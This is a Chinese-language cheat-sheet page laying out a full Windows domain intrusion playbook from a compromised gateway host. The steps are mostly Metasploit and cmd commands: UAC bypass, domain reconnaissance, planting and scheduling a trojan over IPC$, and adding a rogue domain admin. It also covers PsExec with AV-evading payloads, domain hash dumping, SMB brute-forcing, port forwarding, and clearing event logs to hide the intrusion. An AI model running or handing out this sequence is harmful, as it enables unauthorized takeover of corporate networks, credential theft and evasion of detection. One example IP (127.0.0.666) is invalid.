LAN

内网域渗透

环境假定

假设已经渗透了一台服务器

name：P1

IP：10.11.0.110

P1 是连接内网和外网的关键节点，其它内网服务器均不能直接连接外网

提权

Meterpreter > shell         #进入目标shell

#然后查看权限

whoami        #假设结果是，xksec

net user xksec /domain

用msf的本地提权漏洞模块，逐个尝试漏洞提权

漏洞提权失败，用Bypass UAC

use exploit/windows/local/bypassuac

set session 9

run        #如果成功会返回一个新的session

如果提权没成功，也是能以此机器为跳板攻击其它服务器的

信息收集

net user /domain        #查看域用户

net view /domain        #查看有几个域

net view /domain:xxx    #查看域内主机

net group /domain    #查看域里面的组

net group "domain computers" /domain    #查看域内所有主机名

net group "domain admins" /domain        #查看域管理员

net group "domain controllers" /domain        #查看域控制器

net group "enterprise admins" /domain        #查看企业管理组

nettime /domain        #查看时间服务器

通过以上信息收集，可以分析出内网是怎么划分的、机器命名规则、重要人物的机器

获取一台服务器的权限

现在因为权限问题，不可以直接攻击域服务器，可采取以下方法继续渗透

用Meterpreter现有权限添加内网路由，扫描弱口令
PowerShell内网扫描( 目标系统win7以上)
架设Socks4a，然后socks会自动进行内网扫描
利用当前权限进行内网IPC$渗透

net view #在列举的机器名里，选一个和我们机器名相似的来进行IPC$渗透

假设现在有一台主机，127.0.0.666

net use \127.0.0.666/ipc$        #连接目标IPC$共享

copy s.exe \127.0.0.666\ipc$    #复制木马到目标

net time \127.0.0.666            #查时间

at \127.0.0.666 10:11 s.exe        #定时启动木马

如果得到的是system权限就可以上传Mimikatz抓hash了

获取域管权限

迁移进程到域管用户进程上，或者令牌窃取也能获取域管权限

然后查看主域控IP

net time     #一般来说，时间服务器都是域服务器

接着，故技重施IPC$渗透返回一个shell

如果at命令被禁用可能是win 2012,使用schtasks来添加计划任务

schtasks /run /tn Mytask

给域控添加管理员账户

net user wintry 514637666 /ad /domain

net group "domain admins" wintry /ad /domain

net group "domain admins" /domain     #查看是否添加成功

登陆域控制

使用msf中的PsExec模块，建议使用Veil之类工具生成免杀的payload

use exploit/windows/smb/psexec

set smbuser wintry

set smbpass 514637666

set smbdomain MEDAB    #域名称

run

反弹成功后，先迁移进程，然后查看sessions(有几个域控权限)

用msf自带模块dumphash抓取域hash，要有system权限

use post/windows/gather/smart_hashdump

show options

set session 5        #域控shell

run

SMB爆破内网

Metepreter > backgroud

exploit > route add 10.11.0.110 255.255.0.0 2 #后边是session id

search smb_login

use auxiliary/scanner/smb/smb_login

set RHOSTS 10.11.0.110/24

set smbuser 域控user

set smbpass 域控pass

set smbdomain MA...

set threads 20

run

扫描完成后，creds，整理扫描结构

获取到了大量内网主机密码

可以使用Meterpreter下的Socks4a或其它第三方软件，端口转发，畅游内网了

Meterpreter > portfwd add -l 5555 -p 3389 -r 目标IP
Meterpreter > backgroud

清理日志

删除之前添加的用户账号

cmd > net user wintry /del
cmd > logoff

删除日志

meterpreter > clearev

关闭所有msf连接

sessions
sessions -K

Previousmsf Nextother

Last updated 6 years ago

Was this helpful?